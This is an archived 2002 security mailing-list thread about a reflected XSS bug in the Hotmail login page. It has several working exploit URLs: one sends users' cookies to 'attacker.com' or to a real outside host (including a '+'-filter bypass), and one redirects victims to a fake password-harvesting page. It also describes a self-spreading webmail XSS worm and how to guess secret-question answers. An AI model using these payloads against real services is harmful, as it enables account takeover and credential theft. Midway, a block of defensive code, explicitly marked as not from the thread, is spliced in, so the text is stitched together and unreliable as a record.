Re: XSS bug in hotmail login page

2002-10-09 Thread Inderjeet S Sodhi

Hi Everyone,
MSN Passport's (read: Microsoft's) basic mentality about security is itself
very insecure. In November 2001 and April 2002, when some security bugs were
mentioned, MSN did patch some of their systems. But surprisingly, we found
many of the systems still used the buggy techniques, say, JavaScript, within
their own pages. Even today, when one opens MSN Hotmail in IE6, it many times
says Script Error (or something similar). Can't they make their own
mail system compatible with their own browser?

Other issues we observed but kept silent were:
a) When MS transitioned from MS hotmail to MSN hotmail, they reset all
users' options to somewhat insecure settings. I am unaware if any warning or
alert was sent before doing so. The settings affected were (still are, and
maybe are default settings for new accounts):

(Under Personal Profile...)
1. Share my e-mail address.

2. Share my first and last names.

3. Share my other registration information.
The above three options are enabled by default. I
assume that these may be a prime source of leaking information to spammers,
besides other security risks. If you have these options enabled, disable
them NOW!

(Under Other Options...)
4. Session Expiration is set to NEVER. Probably, if session expiration is
set to the minimum available 2 hours, chances of others getting into your
Hotmail accounts become less.

B) The change password policy: Hotmail's Reset Password option can be used by
any user, as long as the account holder is not in the US, that is, his/her
location is not set to US. This is because when the "forgot password" option
is invoked (and a secret question is present in the database), the next step
asks for the username and country. If the country is not US, then a third
field, ZIP CODE, is skipped and the secret question page is shown. Of course
one has to know the answer to the question, but then, MS has provided enough
freedom to users to type in any question they like. During our research, we
found questions like "How are you?" and "Whom do you love most?". Anyone's
guess: we found answers to be like "Fine" (or "Bad" or "Not Good") and "me"
(or "myself" or "my lover") respectively. The answers in brackets are the
next-possible-answers, but we could guess, at most, on the second attempt
only.

Time to change hotmail policies??

With warm regards and best wishes.

Inderjeet S Sodhi
Infotech Consultant, E-Security and S/W Solution Provider,
Web Designer and Beta Tester.







RE: XSS bug in hotmail login page

2002-10-08 Thread Russell Harding

Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>

  I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests.  While you can view your own cookies easily, I'm not
sure if you can still exploit this bug.  I do know filtering these
characters prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);&ct=1033054530&_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

   -Russell

P.S. Well, I suppose the real question may be this:
Is there a way to concatenate javascript strings without "+" or "%2B"?



On Mon, 7 Oct 2002, Thor Larholm wrote:

> > From: Peter Rdam [mailto:[EMAIL PROTECTED]]
> > They didnt reacted, and im pretty curious about what
> > is possible with the bug. And i actually hope that
> > someone can tell me about it and maybe Microsoft will
> > do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
>
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer
>




Re: XSS bug in hotmail login page

2002-10-08 Thread Berend-Jan Wever

If you can't get spaces in, escape them:
eval(unescape("alert('spaces%20wherever%20you%20want');"));
You can encode any character you want this way.

I have some papers on XSS bugs and their implications and some tips, tricks
and tools online at my website. Might be interesting for all you wannabe
XSS-hackers and anybody who has a website or web-based application to secure
from XSS. http://spoor12.edup.tudelft.nl/

Impact for the Hotmail XSS: I wrote a Hotmail virus a few months back. It's
written in JavaScript and it abuses XSS bugs to spread itself to all people
in your address book & inbox. It works like a charm on IE and Netscape
(probably Mozilla too). It infects Yahoo too (using another, yet
undisclosed, XSS bug in Yahoo). I was working on a port to mail.com but got
bored.
Combine this mass-mailer worm with the recent "download and execute any
file" bugs for IE by Jelmer and friends and you've got another mass-mailin',
backdoorin', script-kiddie virus. Only this time it's not just for Outlook
but for any JavaScript-capable browser(!)

So, amongst the known security problems XSS poses, you can now add that XSS
bugs can lead to infection with a virus and/or a backdoor. (I hope you're
not reading this with web-based Hotmail or Yahoo ;)

Berend-Jan Wever
<[EMAIL PROTECTED]>

http://spoor12.edup.tudelft.nl/

0x0dd31337 - you know who you are ;)





Re: XSS bug in hotmail login page

2002-10-08 Thread Muhammad Faisal Rauf Danka

A lot can happen for sure, but I tried one myself, to redirect the request to some
other webpage.
One can make a fake Hotmail page asking for the password, storing it locally in a text file
and then again redirecting to the original Hotmail page.
Using this method one could steal passwords of Hotmail/MSN users.
We have all seen previously people making Hotmail-looking pages, asking you to first
login through it, or asking you to send your login/pass along with the login name of
the person you want to get hacked (all nasty scams like that).
Now if it is not fixed they will have an easy way to trick them by asking them to
visit the new Hotmail policy at:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace("http://www.ownhomepage.com/frames/hotmailfake.html";);&ct=1033054530&_setlang=

And then have a fake setup to trick them entering their passwords at:
http://www.ownhomepage.com/frames/hotmailfake.html


Regards

Muhammad Faisal Rauf Danka

Head of GemSEC / Chief Technology Officer
Gem Internet Services (Pvt) Ltd.
web: www.gem.net.pk
Key Id: 0x784B0202
Key Fingerprint: 6F8C EDCF 6C6E 06A5 48D7 6A20 C592 484B 
784B 0202




RE: XSS bug in hotmail login page

2002-10-08 Thread Thor Larholm

> From: Russell Harding [mailto:[EMAIL PROTECTED]]
> Is there another way to exploit this which I am not 
> seeing? Or does MSN actually have their act together
>  (in this particular case...)?
> 
>   -Russell
> 
> P.S. Well, I suppose the real question may be this:
> Is there a way to concatenate javascript strings without "+" or "%2B"?

Sure there is, the first that springs to mind is to use the replace method
which all strings have:

var myString = "hi $".replace('$','monkeyboy');
alert( myString ); // alerts "hi monkeyboy"

The first argument can be both a string or a regular expression.

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>location.replace('http://jscript.dk/2002/10/sec/querystring.asp?$'.replace('$',document.cookie));&ct=1033054530&_setlang=",,-1,0




Regards
Thor Larholm
Jubii A/S - Internet Programmer
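Both Berend-Jan's unescape() note and Thor's String.replace trick make the same defensive point: a blacklist that strips '+' (or spaces) from the query string does not close the hole, because the reflected value can still leave the attribute it is echoed into. The following is an added example, not code from the thread or from Hotmail; it assumes a hypothetical template that reflects the `cb` parameter into a quoted HTML attribute, and puts the thread's filter beside the encoding that actually fixes it.

```javascript
// Added example, not code from the thread: the login page is assumed to
// reflect the `cb` query parameter into a quoted HTML attribute (template
// below is hypothetical), and the thread debates whether stripping '+' and
// '%2B' from the request is enough to block the injection.

// The blacklist described in the thread: only '+' and its URL-encoded form go.
function stripPlusFilter(value) {
  return value.replace(/\+|%2B/gi, '');
}

// The actual fix: encode every character that can change the HTML context,
// so the reflected value can never leave the attribute, whatever it contains.
function htmlAttrEncode(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return value.replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed shape of the reflection point (hypothetical template).
function renderHiddenField(cb, sanitize) {
  return '<input type="hidden" name="cb" value="' + sanitize(cb) + '">';
}

// Checks that the untrusted value stayed inside the attribute: the template
// contributes exactly six double quotes and one '<'; anything beyond that
// means the value closed the attribute early or opened a new tag.
function attributeIntact(markup) {
  const quotes = (markup.match(/"/g) || []).length;
  const tags = (markup.match(/</g) || []).length;
  return quotes === 6 && tags === 1;
}

// Constructed probe: it breaks out of the attribute without using '+', which
// is the thread's point ('$'.replace(...) and unescape() need no '+').
const PROBE = '"><b>probe</b>';

console.log(attributeIntact(renderHiddenField(PROBE, stripPlusFilter))); // false
console.log(attributeIntact(renderHiddenField(PROBE, htmlAttrEncode)));  // true
```

Note that htmlAttrEncode leaves a legitimate '+' in the value untouched, so the fix costs nothing in functionality, unlike the blacklist.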



RE: XSS bug in hotmail login page

2002-10-07 Thread Thor Larholm

> From: Peter Rdam [mailto:[EMAIL PROTECTED]]
> They didnt reacted, and im pretty curious about what 
> is possible with the bug. And i actually hope that 
> someone can tell me about it and maybe Microsoft will 
> do something about it..

It's very simple, you can inject arbitrary scripting to be executed by the
user in the context of hotmail. This means that you can e.g. steal his
cookies or, if he's logged in, write emails from his account, delete his
mails and change his password.



Regards
Thor Larholm
Jubii A/S - Internet Programmer



XSS bug in hotmail login page

2002-10-07 Thread Peter Rdam

Goodevening people,

I've found a "little (not sure)" XSS bug in the Hotmail login page, I just started to
learn about XSS bugs. I didn't try too much on this, I even contacted Microsoft. They're
probably very busy with counting do, or it's a harmless bug.. got no idea ;). They didn't
react, and I'm pretty curious about what is possible with the bug. And I actually
hope that someone can tell me about it and maybe Microsoft will do something about
it.. so check it out.. the + sign is filtered out.. and hey be cool.. dunno what's
possible with it.. but keep it to exploiting I would say.. Hope someone can explain
what is possible with this bug.. I'm worried about my Hotmail addy security (lol)

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb=";>alert(document.cookie)&ct=1033054530&_setlang=


Regards,
Addic
RDMNL
P.S. Sorry for my bad English :P



